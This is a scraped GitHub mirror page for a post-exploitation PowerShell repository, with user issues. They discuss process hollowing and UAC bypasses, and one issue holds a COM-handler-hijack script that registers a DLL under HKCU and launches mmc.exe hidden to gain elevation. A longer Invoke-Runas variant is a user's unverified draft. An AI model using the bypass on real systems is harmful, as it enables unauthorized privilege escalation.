fuzzysecurity / powershell-suite Goto Github PK

View Code? Open in Web Editor NEW

2.6K 2.6K 760.0 5.94 MB

My musings with PowerShell

License: BSD 3-Clause "New" or "Revised" License

PowerShell 95.31% C# 0.80% C 3.89%

powershell-suite's Introduction

Hey 👋

Each line of arcane script, each cryptogram, speaks of a journey into the labyrinthine architecture of digital unknowns, a deft pursuit amongst the echoes of creation and obliteration. These silent testaments, these repositories, though but a fraction of the cosmos, encapsulate an audacious journey into the nebulous heart of our binary existence, a voyage fuelled by an unquenchable thirst for comprehension, and a relentless desire to decode the indecipherable.

About

My areas of focus include Windows internals, .NET cross-platform development, post-exploitation, binary instrumentation, Electron and vulnerability research❗
I like working on bizarre research projects across verticals, the more esoteric the better
Artisan ☀️, Developer 🌘, Harmonizer ⬆️
Certified Windows 🪟 shill, it's just better than what you're running

Languages and Tools

Reach Out

If you want to reach out securely you can use my GPG key.

Key metadata:

smart card   D2760001240100000006233501640000 (YubiKey 5)
pub          nistp521 2023-02-07 [SC] [expires: 2025-02-06]
             E21EF757439340B9DEBD7AC6AE48B1EEBCCCACFC
uid          Ruben Boonen (b33f) <[email protected]>
sub          nistp521 2023-02-07 [E]

Github Stats

powershell-suite's People

Contributors

Stargazers

Watchers

Forkers

johnjohnsp1 carnal0wnage tweekfawkes wflk filthiest 00derp s-you songofhack rootkiter h43a1hi mmsatari h1d3r idkwim phantom0301 crazykid199 eniac888 chubbymaggie akustolin kurtdegreeff viss xsine3 ccavxx mujiansu ognz jakuta-tech brianwrf ra0mb1er leerina pekita1 diggold tr33-he11 schrodyn rsdovers neverlovelynn dave5623 lucabongiorni pseudozidu spnow q158073378252010 snollyg0st3r khr0x40sh johnhubcr nnamon jajp777 initpwn ktowne gitcollect uncia kazimer testzzzz carloss7 tempuser1909 hackmycontrolsystem kr1shn4murt1 methos2016 phpplay dipsec deki0r geassdb 453483289 modulexcite gavioto ctxis sinmygit ror13h jack51706 jbarcia kennyzeng techlord-rce hotelzululima h265 xuechiyaobai egebalci matool13 poeblu bhafsec caineqt nsxz cygonz0 berise theralfbrown vysecurity uppentest antonini team-firebugs darthra shantanu561993 yoohooyoo blursight awesome-security jeperez dungtv543 jamesshew mrlobic j14nj13 vaginessa starrkdevil hurryon chaojianhu arevindh

powershell-suite's Issues

Start-Hollow not pasing enviroment vars.

Hello,
Executing STart-Hollow script on any program that needs enviroment variables (Such as PATH), results in error.

Even running simple c++ program that shows messagebox with enviroments vars, results in empty vars appearing.
Any fix?

Running Bypass UacMethodNetOle32 broke WMI and spawn elevated shells

I found that after running the UacMethodNetOle32 Bypass, WMI doesn't work anymore.

...and if I try to run procexp.exe, procmon.exe, etc. instead of running it properly it spawns me a powershell console.

COM handler hijack

Hi there. I was wondering if you could give me any tips on making a powershell script for this UAC bypass. I've tried to copy the metasploit module but I've got nowhere. function ComBypass{
param(
[Parameter(Mandatory = $False)]
[String]$dllFile
)
$rootKey="HKCU:\SOFTWARE\Classes\CLSID{0A29FF9E-7F9C-4437-8B11-F424491E3931}"
$inproc_key = "$rootKey\InProcServer32"
$shell_key = "$rootKey\ShellFolder"
New-Item $rootKey -Force
New-Item $inproc_key
New-Item $shell_key
New-ItemProperty -Path $inproc_key -Name "(Default)" -Value $dllFile
New-ItemProperty -Path $inproc_key -Name 'ThreadingModel' -Value 'Apartment'
New-ItemProperty -Path $inproc_key -Name 'LoadWithoutCOM' -Value ''
New-ItemProperty -Path $shell_key -Name 'HideOnDesktop' -Value ''
New-ItemProperty -Path $shell_key -Name 'Attributes' -PropertyType 'DWord' -Value 0xf090013d
Start-Process -File cmd.exe -ArgumentList "/c mmc.exe CompMgmt.msc" -WindowStyle Hidden
Start-Sleep -Seconds 10
Remove-Item -Path $rootKey -Force -Recurse

}
ComBypass -dllFile "C:\cmd.dll"

Code conversion

Masquerade-PEB

If you don't mind,
I'd like to ask if you can convert to autoit code.
or,
Even a hint.

Will these scripts still run normally?

I can't seem to do anything to get them to work. Whenever I try to execute a script my powershell window just jumps to a new line no error nothing. It does nothing I am running powershell as admin and I have the right execution policy but none of the scripts seem to do anything for me?

Please use an example?

Thanks...

Possibility to not open the new window

Is it possible to not open new window (counterpart of -NoNewWindow switch in start-process)?
There's no such information in argument list.

PowerShell-Suite/Invoke-Runas.ps1

Line 32 in 412cea3

    
                -Args              Arguments to pass to the module, e.g. "/c calc.exe". Defaults

Wish: Enumerate Snapshots (available on shared folders)

Hello
I it possible you can implement this system call (SMB) into powershell ?
Previous File Version Enumeration: https://msdn.microsoft.com/en-us/library/cc246471.aspx

I found this code that is working: https://github.com/HiraokaHyperTools/EnumerateSnapshots/blob/master/Source.cpp

The expected result would look like that:

@GMT-2018.05.19-16.00.05
@GMT-2018.05.18-16.00.05
@GMT-2018.05.17-16.00.05
@GMT-2018.05.16-16.00.05
@GMT-2018.05.15-16.00.05
@GMT-2018.05.14-16.00.06
@GMT-2018.05.13-16.00.04

I was unable to transform type definitions to PowerShell.

Thanks to take a look at this.
Jean-Marc

is it possible to use `invoke-runas` to open a new cmd with elevated privileges in the same shell itself?

Except Invoke-Runas.ps1 to output stdout of command which we excute

I try to create a pipe to output the command's stdout.

function Invoke-Runas {

<#
.SYNOPSIS
    Overview:
    
    Functionally equivalent to Windows "runas.exe", using Advapi32::CreateProcessWithLogonW (also used
	by runas under the hood).
    
    Parameters:
     -User              Specifiy username.
     
     -Password          Specify password.
     
     -Domain            Specify domain. Defaults to localhost if not specified.
     
     -LogonType         dwLogonFlags:
                          0x00000001 --> LOGON_WITH_PROFILE
                                           Log on, then load the user profile in the HKEY_USERS registry
                                           key. The function returns after the profile is loaded.
                                           
                          0x00000002 --> LOGON_NETCREDENTIALS_ONLY (= /netonly)
                                           Log on, but use the specified credentials on the network only.
                                           The new process uses the same token as the caller, but the
                                           system creates a new logon session within LSA, and the process
                                           uses the specified credentials as the default credentials.
     
     -Binary            Full path of the module to be executed.
                       
     -Args              Arguments to pass to the module, e.g. "/c calc.exe". Defaults
                        to $null if not specified.
                       
.DESCRIPTION
	Author: Ruben Boonen (@FuzzySec)
	License: BSD 3-Clause
	Required Dependencies: None
	Optional Dependencies: None
.EXAMPLE
	Start cmd with a local account
	C:\PS> Invoke-Runas -User SomeAccount -Password SomePass -Binary C:\Windows\System32\cmd.exe -LogonType 0x1
	
.EXAMPLE
	Start cmd with remote credentials. Equivalent to "/netonly" in runas.
	C:\PS> Invoke-Runas -User SomeAccount -Password SomePass -Domain SomeDomain -Binary C:\Windows\System32\cmd.exe -LogonType 0x2
#>

	param (
		[Parameter(Mandatory = $True)]
		[string]$User,
		[Parameter(Mandatory = $True)]
		[string]$Password,
		[Parameter(Mandatory = $False)]
		[string]$Domain=".",
		[Parameter(Mandatory = $True)]
		[string]$Binary,
		[Parameter(Mandatory = $False)]
		[string]$Args=$null,
		[Parameter(Mandatory = $True)]
		[int][ValidateSet(1,2)]
		[string]$LogonType
	)  

	Add-Type -TypeDefinition @"
	using System;
	using System.Diagnostics;
	using System.Runtime.InteropServices;
	using System.Security.Principal;
    using Microsoft.Win32.SafeHandles;
	
	[StructLayout(LayoutKind.Sequential)]
	public struct PROCESS_INFORMATION
	{
		public IntPtr hProcess;
		public IntPtr hThread;
		public uint dwProcessId;
		public uint dwThreadId;
	}
	
	[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
	public struct STARTUPINFO
	{
		public uint cb;
		public string lpReserved;
		public string lpDesktop;
		public string lpTitle;
		public uint dwX;
		public uint dwY;
		public uint dwXSize;
		public uint dwYSize;
		public uint dwXCountChars;
		public uint dwYCountChars;
		public uint dwFillAttribute;
		public uint dwFlags;
		public short wShowWindow;
		public short cbReserved2;
		public IntPtr lpReserved2;
		public IntPtr hStdInput;
		public IntPtr hStdOutput;
		public IntPtr hStdError;
	}

    [StructLayout(LayoutKind.Sequential)]
    public struct SECURITY_ATTRIBUTES
    {
        public int nLength;
        public IntPtr lpSecurityDescriptor;
        [MarshalAs(UnmanagedType.Bool)]
        public bool bInheritHandle;
    }

    public enum StdHandle { Stdin = -10, Stdout = -11, Stderr = -12 };

	public static class Advapi32
	{
		[DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)]
		public static extern bool CreateProcessWithLogonW(
			String userName,
			String domain,
			String password,
			int logonFlags,
			String applicationName,
			String commandLine,
			int creationFlags,
			int environment,
			String currentDirectory,
			ref  STARTUPINFO startupInfo,
			out PROCESS_INFORMATION processInformation);
	}
	
	public static class Kernel32
	{
		[DllImport("kernel32.dll")]
		public static extern uint GetLastError();

        [DllImport("kernel32.dll", CharSet=CharSet.Auto, SetLastError=true)]
        public static extern bool CreatePipe(
            ref IntPtr hReadPipe,
            ref IntPtr hWritePipe,
            IntPtr lpPipeAttributes,
            int nSize);

        [DllImport("kernel32.dll", CharSet=CharSet.Auto, SetLastError=true)]
        public static extern bool SetHandleInformation(
            IntPtr hObject,
            int dwMask,
            int dwFlags);

        [DllImport("kernel32.dll", CharSet=CharSet.Auto, SetLastError=true)]
        public static extern bool CloseHandle(
            IntPtr hObject);

        [DllImport("kernel32.dll", CharSet=CharSet.Auto, SetLastError=true)]
        public static extern IntPtr GetStdHandle(
            StdHandle std);

        [DllImport("kernel32.dll", CharSet=CharSet.Auto, SetLastError=true)]
        public static extern bool ReadFile(
            IntPtr hFile,
            [Out] byte[] lpBuffer,
            uint nNumberOfBytesToRead,
            out uint lpNumberOfBytesRead,
            IntPtr lpOverlapped);

        [DllImport("kernel32.dll", CharSet=CharSet.Auto, SetLastError=true)]
        public static extern bool WriteFile(
            IntPtr hFile,
            [In] byte[] lpBuffer,
            int nNumberOfBytesToRead,
            out uint lpNumberOfBytesRead,
            IntPtr lpOverlapped);
	}
"@
	# prepare pipeline
    $sa = New-Object SECURITY_ATTRIBUTES
    $sa.nLength = [System.Runtime.InteropServices.Marshal]::SizeOf($sa)
    $sa.lpSecurityDescriptor = 0
    $sa.bInheritHandle = $True
    [IntPtr]$attr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.Runtime.InteropServices.Marshal]::SizeOf($sa))
    [System.Runtime.InteropServices.Marshal]::StructureToPtr($sa, $attr, $True)
    [IntPtr]$hWrite = 0
    [IntPtr]$hRead = 0
    $CallResult = [Kernel32]::CreatePipe([ref]$hRead, [ref]$hWrite, $attr, 4096)

    if($CallResult) {
        $CallResult = [Kernel32]::SetHandleInformation($hRead, 0x00000001, 0)
    }

    if($CallResult) {
	    # StartupInfo Struct
	    $StartupInfo = New-Object STARTUPINFO
	    $StartupInfo.dwFlags = 0x00000101
	    $StartupInfo.wShowWindow = 0x0001
	    $StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo)
        $StartupInfo.hStdOutput = $hWrite
        $StartupInfo.hStdError = $hWrite
	
	    # ProcessInfo Struct
	    $ProcessInfo = New-Object PROCESS_INFORMATION
	
	    # CreateProcessWithLogonW --> lpCurrentDirectory
	    $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
	
	    echo "`n[>] Calling Advapi32::CreateProcessWithLogonW"
	    $CallResult = [Advapi32]::CreateProcessWithLogonW(
		    $User, $Domain, $Password, $LogonType, $Binary,
		    $Args, 0x04000000, $null, $GetCurrentPath,
		    [ref]$StartupInfo, [ref]$ProcessInfo)
    }
	
	if (!$CallResult) {
		echo "`n[!] Mmm, something went wrong! GetLastError returned:"
		echo "==> $((New-Object System.ComponentModel.Win32Exception([int][Kernel32]::GetLastError())).Message)`n"
	} else {
		echo "`n[+] Success, process details:"
		Get-Process -Id $ProcessInfo.dwProcessId
        [Kernel32]::CloseHandle($ProcessInfo.hProcess)
        [Kernel32]::CloseHandle($ProcessInfo.hThread)
        # Read from pipe
        $chBuf = New-Object Byte[] 4096
        [uint]$dwRead = 0
        [uint]$dwWritten = 0
        [SafeHandles]$hParentStdOut = [Kernel32]::GetStdHandle(-11)
        for(;;) {
            $bSuccess = [Kernel32]::ReadFile($hRead, $chBuf, 4096, [ref]$dwRead, [system.Intptr]::Zero)
            if(!$bSuccess -or ($dwRead -eq 0)) {
                break
            }
            $bSuccess = [Kernel32]::WriteFile($hParentStdOut, $chBuf, $dwRead, [ref]$dwWritten, [system.Intptr]::Zero)
            if(!$bSuccess -or ($dwRead -lt 4096)) {
                break
            }
        }
	}
}